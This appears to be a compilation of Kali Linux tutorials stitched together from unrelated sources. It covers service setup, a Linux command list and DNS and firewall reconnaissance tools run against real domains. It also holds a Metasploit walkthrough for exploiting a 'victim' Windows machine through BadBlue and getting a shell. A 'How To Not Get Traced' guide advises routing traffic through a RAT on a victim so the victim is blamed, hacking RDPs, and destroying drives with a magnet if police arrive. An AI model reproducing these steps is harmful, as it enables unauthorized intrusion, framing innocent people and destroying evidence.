Managing Kali Linux Services

Kali  Linux  is  a  specialized  Linux  distribution  aimed  at  security  professionals. As  such,  it  contains  several  non-­‐‐standard  features.  The  default  Kali  installation  ships  with  several services  preinstalled,  such  as  SSH,  HTTP,  MySQL,  etc.  If  left  untouched,  these  services  would  load  at  boot  time,  which  would  result  in  Kali  Linux  exposing  several  open  ports  by  default  –  something  we  want  to  avoid,  for  security  reasons.  Kali  deals  with  this  issue  by  updating  our  settings  to  prevent  network  services  from  starting  at  boot  time. 
   
     The following module will discuss some of these services, as well as how to operate and manage them.

Default root Password:- 

         If you installed Kali from an image file, the installation process should  have prompted you for a root password. If you are using the Kali Linux   VMware image, as recommended, the default root password is   "toor".   Make sure to change any default or weak passwords to something long,   complex, and secure before starting any services such as SSH. The root  password can be changed with the passwd command as shown below. 

SSH Service:- 

           The Secure Shell (SSH)3 service is most commonly used to  remotely access a computer, using a secure, encrypted protocol. However, as we will see later on  in the course, the SSH protocol has some surprising and useful features, beyond providing terminal access. The SSH service is TCP-­based and listens by default on port 22. To start the SSH service in Kali, type the following command into a Kali terminal.
       We can verify that the SSH service is running and listening on TCP port 22 by using the netstat command and piping the output into the grep command  to search the output for sshd.

          If, like many users, you want to have the SSH service start automatically at boot time, you need to enable it using the update-­rc.d script as follows. The  update-­rc.d script can be used to enable and disable most services within Kali Linux.

HTTP Service:-

          The HTTP service can come in handy during a penetration test,  either for hosting a site, or providing a platform for downloading files to a victim machine. The  HTTP service is TCP-­based and listens by default on port 80. To start  the HTTP service in Kali, type the following command into a terminal.

             As we did with the SSH service, we can verify that the HTTP  service is running and listening on TCP port 80 by using the netstat and grep commands once again.

             To have the HTTP service start at boot time, much like with  the SSH service, you need to explicitly enable it with update-­rc.d  

How to Hack Window 7 using badblue exploit

Introduction of BadBlue :-

                        Basically it  used for file sharing many organization use this software for file sharing
& hacker can take advanctage of it how ?? lets see.....

 Steps:-

1. Fire the metasploit framework by using "msfconsole" in terminal.

2. Type "search badblue" in msf framework and hit enter.

3.    Now type "use exploit/windows/http/badblue_passthru" and hit enter.

4.  Set the required arguments for the exploit for this type "show options" it will give required argument we want to set.

5.  Type "set rhost  <ip_address of victim>" hit enter.

6.  Now final type "exploit" to exploit our victim remotely.

7.    When you get the meterpreter session it means you are in the victim system for check type "sysinfo" to see information about our victim. and type "shell" to interact with victim's cmd.

Load Balancing Detector (lbd) in Kali Linux

Introduction

Load Balancing Detector (lbd) is a tool which checks, if a given domain use load balancing or not. This tool is mainly used by pentesters and hackers to checks site is dosable or not.

Objectives

In this tutorial we will learn how to use Load Balancing Detector (lbd).

Procedure

How to open it :-

Open lbd  through Kali Linux >> Information Gathering >> IDS IPS Identification

 >>  lbd

How to use it :-

·      To use it, you have to use this command usage: /usr/bin/lbd [domain]

·      This tool will first scans for DNS-Load Balancing and then HTTP-Load Balancing.

·      Atlast, it will show the result.

Firewall Detection Tool Wafw00f in Kali Linux

Introduction

This is a Web Application Firewall Detection Tool.
The tool was written by – Sandro Gauci And G. Henrique.

It will help you detect the WAF ( Web Application Firewall )  behind the any domain.
Wiffit (Wafw00f ) can test for these Firewalls listed in the image -
If any firewall is detected from the list it will display on-screen

How Wiffit (Wafw00f) detects Web Application Firewall (WAF)
To detect WAF it looks for the following things :

• Cookies
• ServerCloaking
• Response Codes
• Drop Action
• Pre Built-In Rules

How to Open Wiffit On Kali Linux

Applications > Kali Linux > Information Gathering > IDS/IPS Identification > wafw00f

wafw00f is open now , see the below image for more details -

How to use wafw00f

Example 1 :
Usage :

1. root@root :

wafw00f [ target url ]

2. Example :

wafw00f www.***.com

3. This example shows that www.***.com is behind the Web Application Firewall.

Useful Commands in Linux

A comprehensive list of commands needed when using Linux:

Command privileges.

    sudo command - run command as root
    sudo su – root shell open
    sudo su user – open shell as a user
    sudo -k – forget your password sudo
    gksudo command – sudo visual dialog (GNOME)
    kdesudo command – sudo visual dialog (KDE)
    sudo visudo – edit / etc / sudoers
    gksudo nautilus – root file manager (GNOME)
    kdesudo konqueror – root file manager (KDE)
    passwd – change your password 

Command Network

    ifconfig – displays information network
    iwconfig – displays information from wireless
    sudo iwlist scan – scan wireless networks
    sudo /etc/init.d/networking restart – reset the network
    (file) /etc/network/interfaces – manual configuration
    ifup interface – bring online interface
    ifdown interface – disable interface 

Commands Display

    sudo /etc/init.d/gdm restart – reset X (Gnome)
    sudo /etc/init.d/kdm restart – reset X (KDE)
    (file) /etc/X11/xorg.conf – show Configuration
    sudo dpkg-reconfigure - reconfigure xserver-xorg-phigh - reset configuration X
    Ctrl+Alt+Bksp – X display reset if frozen
    Ctrl+Alt+FN – switch to tty N
    Ctrl+Alt+F7 – switch back to X display 

Commands Service System.

    start service – service to start work (Upstart)
    stop service – service to stop working (Upstart)
    status service – check if service is running (Upstart)
    /etc/init.d/service start – start service (SysV)
    /etc/init.d/service stop – stop service (SysV)
    /etc/init.d/service status – check service (SysV)
    /etc/init.d/service restart – reset service (SysV)
    runlevel – get current runlevel 

Commands for Firewall.

    ufw enable – turn on the firewall
    ufw disable – turn off the firewall
    ufw default allow – allow all connections by default
    ufw default deny – drop all connections by default
    ufw status – current rules and
    ufw allow port – to allow traffic on port
    ufw deny port – port block
    ufw deny from ip – ip block 

Command System.

    lsb_release -a – get the version of Ubuntu
    uname -r – get kernel version
    uname -a – get all the information kernel 

Commands for Package Manager.

    apt-get update – refresh updates available
    apt-get upgrade – update all packages
    apt-get dist-upgrade – version update
    apt-get install pkg – installing pkg
    apt-get remove pkg – uninstall pkg
    apt-get autoremove – removing packages obsotletos
    apt-get -f install – try to fix packages
    dpkg –configure -a – try to fix a broken package
    dpkg -i pkg.deb – install file pkg.deb
    (file) /etc/apt/sources.list – list of repositories APT 

Special Packages For commands.

    ubuntu-desktop – Setting the standard Ubuntu
    kubuntu-desktop – KDE Desktop
    xubuntu-desktop – desktop XFCE
    ubuntu-minimal – core earnings Ubuntu
    ubuntu-standard – the standard utilities Ubuntu
    ubuntu-restricted-extras – not free, but useful
    kubuntu-restricted-extras – ditto KDE
    xubuntu-restricted-extras – ditto XFCE
    build-essential – packages used to compile
    linux-image-generic – latest generic kernel image
    linux-headers-generic – latest headlines 

Applications commands.

    nautilus – File Manager (GNOME)
    dolphin – File Manager (KDE)
    konqueror – Web browser (KDE)
    kate – text editor (KDE)
    gedit – text editor (GNOME)

How To Not Get Traced

First you are going to want to know what you need, right?

VPN

PuTTY

Tor

RDP

Proxy

RAT

SMAC

TrueCrypt

Magnet


---------------------------------------------------------------------------

First you want to buy a VPN, free VPNs are always shitty and raped
by the NSA. I sugget Private Internet Access as a good VPN,
They have no logs, offshore location and private IPs.
If you want to cut a little bit by about $2 go a head and buy nVPN.

These are VPNs that use the OpenVPN protocol so you are going to
have to need OpenVPN.

You will need to use a VPN whilst on skype or you will be easily doxed.

---------------------------------------------------------------------------

PuTTY is essential for setting up a SSH/VPS network. If someone DDoS's your
VPN you can fall back to you SSH/VPS untill your VPN comes back up.
SSH is also a good layer to your chain (will speak about soon)

---------------------------------------------------------------------------

Tor Browser is a brilliant browser that is designed to stop internet spying.
Tor has 3 Nodes, Entry Node, Middle Node and the Exit node which are good
layers to your chain.
These nodes act as 3 different IPs that help reinfource your anonymity.

----------------------------------------------------------------------
-----
A RDP (Remote Desktop Protocol) works like a SOCKS5 Proxy, it is hosted
by another computer network. There are many free RDP's but some cost money,
You can easily hack RDPs. This is also a vital layer to your chain.

---------------------------------------------------------------------------

A proxy is similar to a VPN but a VPN encrypts all network access, A proxy
will only encrypt your browser network. You can set up as many proxies as
you want by using a open source tool called 'Proxifier'

I have my own project coming along called SkypeGhost, Which is a skype
configuration file which acts as a proxy of your choice. (Out soon!)

---------------------------------------------------------------------------

You will need a RAT for its Reverse Socks5 feature, this enables your current
IP to be you victims IP and you will be Doxed/Traced to him.
Most RATs have this feature, If you dont want to set up portwarding you need
to use a PHP Rat.

---------------------------------------------------------------------------

SMAC is a tool like a VPN but for your MAC address, it works too spoof your
MAC address making it harder to trace you. Their are other alternatives
to SMAC but I think this is the best for me.

---------------------------------------------------------------------------

TrueCrypt is a tool for encrypting your hard drive from pentesters,
you can choose which HDD's to encrypt as you go!

---------------------------------------------------------------------------

A Magnet is used for rolling along your HDD if the cops come to
destroy the drive.

---------------------------------------------------------------------------

Your chain should look like this;

RDP>>VPS/SSH>>VPN>>Reverse SOCS5>>Your Proxy Chain>>Tor Entry Node>>
Tor Middle Node>> Tor Exit Node

Information Gathering With dnsrecon Kali Linux

DNSRecon is a tool for enumeration, coded in python.

DNSRecon provides the ability to perform:

• Check all NS Records for Zone Transfers
• Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT)
• Perform common SRV Record Enumeration. Top Level Domain (TLD) Expansion
• Check for Wildcard Resolution
• Brute Force subdomain and host A and AAAA records given a domain and a wordlist
• Perform a PTR Record lookup for a given IP Range or CIDR
• Check a DNS Server Cached records for A, AAAA and CNAME Records provided a list of host records in a text file to check
• Enumerate Common mDNS records in the Local Network Enumerate Hosts and Subdomains using Google

So Lets begin:-

      

                                     Open dnsrecon through Kali Linux >> Information Gathering >>  Dns Analysis >> dnsrecon

For std, type: dnsrecon -t std -d youtube.com

For SRV type : dnsrecon -t srv -d gmail.com

 For axfr, type:-dnsrecon -t axfr -d saintangelos.com

 For tld, type: dnsrecon -t tld -d saintangelos.com

Enumerating DNS records with DNSenum Tool in Kali Linux

Multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.

OPERATIONS:

• Get the host’s addresse (A record).
• Get the namservers (threaded).
• Get the MX record (threaded).
• Perform axfr queries on nameservers and get BIND VERSION (threaded).
• Get extra names and subdomains via google scraping (google query = “allinurl: -www site:domain”).
• Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded).
• Calculate C class domain network ranges and perform whois queries on them (threaded).
• Perform reverse lookups on netranges ( C class or/and whois netranges) (threaded).
• Write to domain_ips.txt file ip-blocks.

Source: https://github.com/fwaeytens/dnsenum

DNS enumeration is the process of locating all DNS servers and DNS entries for an organization. DNS enumeration will allow us to gather critical information about the organization such as usernames, computer names, IP addresses, and so on. To achieve this task, we will use DNSenum

and enter the following command

root@Kali:~# dnsenum - - enum example.com

It Will Show you Host address , Name Servers address , Mail ( MX) Server and Zone Trabsfer Information.

Enumerate DNS Records using dnsdict6

                                            *INTRODUCTION*

If you want to gather information about a target’s DNS, you should probably use a tool like dnsdict6 to help you to enumerate many of the details which are not easily apparent for your average user or websurfer.

With dnsdict6 you find information such as:

·      Subdomain info

·      Enumerate all ipv4 and ipv6 addresses.

·      You can also enumerate details of srv records.

·      Also you can enumerate details of Name Server and Mail Exchanger records.

So, now we will jump into dnsdict6 on Kali Linux, your best option for a penetration testing distribution.

HOW TO OPEN DNSDICT6 ON KALI LINUX

To open dnsdict6 goto > Kali Linux > Information Gathering > DNS Analysis > dnsdict6
See the below image:

DNSDICT6 OPENED

Once you opened dnsdict6, you will find various options on your screen.
A good Pen Tester will always read and understand all options at his disposal.
So lets see what kind of options we have, and some examples:

• -4 : dump ipv4 addresses : Try this example on your terminal > Example > dnsdict6 -4 [url]
• -t [#] : specify the number of threads.  Remember default is set to 8 and max threads you can use is 32. Ex : dnsdict6 -d -t 18 [url]
• -d : it displays ipv6 info on NS, MX DNS domain information. Example : dnsdict6 -d [url]
• -S : perform SRV service records. Example : dnsdict6 -S -t 21 [url]
• -[smlx] : This options is for choose size of the inbuilt dictionary -s : small, -m medium, -l : large, -x: xtreme

For more information you can see the below image:

DNSDICT HELP OPTION

If you need help you can use the help option.
Command is :
dnsdict6 -h
See the result of this command in the below image:

EXAMPLE 1 : ENUMERATION WITH DEFAULT SETTINGS

This example shows the DNS entries of a given url.
Command is :
dnsdict6 google.com
When you run this command with options it automatically takes the default no of threads i.e 8 and dictionary size -m(eduim=796).
And in this command, it takes 1 – 2 minutes to complete this process.
See the below image:

This tool shows you big list of entries if you are enumerating a larger web domain, such as facebook, google, etc…

EXAMPLE 2: ENUMERATING DNS RECORDS

In this example, you will find the nameserver (NS) and Mail exchange (MX) records.
To see the NS & MX records, you have to use “-d ” option. As we have used in our example.
After running the command, it shows the dns records of google.com with ipv4 addresses.
Why Ipv4 addresses? Because we used the -4 option with the command which dump all the ipv4 addresses.
Remember: If we dont specified any threads and dictionary size, it takes it default threads(8) and dictionary size (medium).

EXAMPLE 3 : ENUMERATE  IPV4 IPV6, NAME SERVER, MAIL SERVER  WITH OPTIONS

This example is same as above in case of enumerating NS and MX records but the mail difference is we are going to set the number of threads and dictionary size manually.
Command is :
dnsdict6 -d46 -t 32  google.com
This command will display the NS and MX records with their ipv4 and ipv6 addresses and the number of threads we use is 32 and dictionary file size we used is xtreme.
So try this example and you will be able to gather as much information as you can

EXAMPLE 4 : ENUMERATE SRV SERVICE RECORDS

Finally, we will take a look at an SRV Record example.
First, we should understand what an SRV Record actually is: (according to Wikipedia)
A Service record (SRV record) is a specification of data in the Domain Name System defining the location, i.e. the hostname and port number, of servers for specified services.
It is defined inRFC 2782, and its type code is 33. Some Internet protocols such as the Session Initiation Protocol (SIP) and the Extensible Messaging and Presence Protocol (XMPP) often require SRV support by network elements.

CONCLUSION:-

This tool is used for enumerating DNS records.
Now that you have the basics, you can try more on your own!
This tool will help you better understand the workings and compartmentalization of domains as well as how a the target business network is organized. This information is for educational and legal Pen Testing utilization. Do not do things that are evil and bad.